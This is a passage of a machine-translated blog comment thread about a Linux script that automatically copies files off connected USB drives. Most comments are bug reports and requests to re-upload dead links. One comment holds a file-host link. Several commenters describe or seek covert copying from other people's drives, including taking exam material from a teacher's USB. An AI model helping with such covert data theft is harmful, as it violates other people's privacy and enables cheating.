 28.   jose dijo

  Kontribut i shkëlqyeshëm, megjithëse dobia që unë do t'i jap nuk është saktësisht ajo për të cilën e keni rritur, nëse e përdor për rezervimin e skedarëve të një grupi përdoruesish, sjellje të keqe që kam I hehehehe.

 29.   ngatërroj dijo

  kur përpiqem të ekzekutoj më jep këtë rresht gabimi 31: [: shumë argumente
  hiqni atë vijë për të parë nëse ka punuar. dhe rezulton se është linja që kufizon madhësinë e pajisjeve.
  kur e heq atë kopjon atë që kam në ndarjet e mia të montuara

 30.   Valente dijo

  Përshëndetje, unë jam i ri dhe e di që tenxherja është e vjetër, por më pëlqeu shumë, skenari juaj është shumë edukativ

  Faleminderit për ndarjen e tij dhe shpjegimin e saj në detaje ...

  përshëndetje

 31.   doltroks dijo

  Shok, ti ​​më shpëtove, mjaftonte të shpërqendroja mësuesin dhe të prezantoja usb në laptopin tim dhe pastaj hahahaaj dha provim dhe shënime nga të gjitha hahaha

  1.    Oetam222 dijo

   Mund të ma kalosh skenarin, lidhja është e prishur

  2.    Oetam222 dijo

   Ju mund të më kaloni skenarin që lidhja është poshtë

 32.   Rra2D2 dijo

  kzkggaara, a mund të rivendosni skedarët? lidhjet janë poshtë: /, shumë faleminderit

 33.   bastiani dijo

  Ju lutem mund të ngarkoni lidhje?

 34.   Necr0 dijo

  degjon! xhaxha! keni rënë lavdërime, mund t'i ngritni përsëri!
  NE RREGULL! : v

 35.   Necr0 dijo

  mirë, e bëj përsëri sepse nuk e di nëse u ngarkua ajo që doja të thoja.

  mirë është që ju keni lidhjet poshtë ju mund t'i ngarkoni ato!

 36.   Rlorau dijo

  Lidhjet janë poshtë !!!

 37.   Zhvilluesi24 dijo

  Ridërgoni lidhjet ju lutem @usemoslinux Unë jam duke hetuar në lidhje me këtë temë, faleminderit!

 38.   anonim dijo

  Skenari mund të shkarkohet nga këtu. Mendoj se është e njëjta gjë

  https://mega.nz/#!yQR1BQTb!FoYoopZ11WSstQaqX1flxhm1t4jCKOI9jj8VIxIBrxk

 39.   John dijo

  Epo atëherë.

  Unë mendoj nga këndvështrimi im modest se është një artikull i shkëlqyeshëm dhe pastaj nëse ka njerëz që thonë se je mashtrues, atëherë mendoj se është në përputhje me qëllimin për të cilin përdor programin.
  Personalisht më pëlqente më shumë për njohjen e gjuhës së programimit për linux pasi që kam punuar vetëm në java, faleminderit shok, ju më zgjuat interesin për të ditur më shumë rreth gjuhës për linux.

  Unë ju falënderoj.

 40.   Hecorat dijo

  Përshëndetje miq, sepse gjeta një mënyrë tjetër për të përdorur këtë skenar është duke bërë rezervë, do të flas me ju pak kam dy pajisje, një aparat fotografik dhe një HDD, ajo që dua është që në vend të regjistrimit të skedarëve, skedarët lokalë të ruajnë ata në një HDD të jashtëm nga kamera në HDD por më jep një gabim që thotë "shumë argumente" a mund të më ndihmoni

 41.   LUIS GEARDO POLANCO VERA dijo

  Ajo punon vetëm me pajisje me sisteme operative linux?

 42.   Duke testuar dijo

  Dikush ta ngre, ju lutem!

 43.   Gazlene dijo

  Përshëndetje, unë nuk kam linux dhe në shkollën time ata përdorin Windows, unë përdora aplikacionin nga usb capture dhe kopjoj vetëm 5 skedarë nga kujtesa e mësuesit, dyshoj se usb ka mbrojtje, sepse e njëjta gjë ndodhi dy herë, do të ketë ndonjë mënyrë tjetër për të zbritur informacionin e plotë nga ai usb?

 44.   Zaraki dijo

  Epo, nëse thoni që kodi do të jetë i thjeshtë, duket shumë interesante të shikoni se si funksionojnë metodat për të parë nëse një USB është i lidhur apo madhësia e ndarjes. Sa keq që ata e kanë hequr skenarin mega.nz, a mund ta ngarkoni përsëri?

  Përshëndetje dhe punë e shkëlqyeshme, e thjeshtë por funksionale edhe për të automatizuar kopjet nga USB !!!

 45.   Breaks dijo

  Mirë!
  Sapo hyra në postimin tuaj në blog, dhe unë jam vërtet i interesuar. Ajo që ndodh është që kur jepni skedarin .zip që ju ridrejton në mega, kjo do të thotë që skedari nuk është më i disponueshëm.
  Po pyesja nëse mund të më dërgonit ato skedarë që supozohet të shkarkohen.
  Faleminderit shumë dhe përshëndetje!

 46.   Alfredo Pereira dijo

  Teknologjia ka një zakon të zvogëlohet në madhësi me kalimin e viteve. Dhe kjo ka ndodhur në një shkallë të jashtëzakonshme me disqet me gjendje të ngurtë (SSD). Tani mund t'i merrni në të njëjtën madhësi si disqet më të shpejtë USB.

  https://clongeek.com/las-unidades-usb-3-0-mas-rapidas/

 47.   a dijo

  Mund të ma dërgoni skedarin ose ta ngarkoni përsëri? Doli që nuk mund të shkarkohet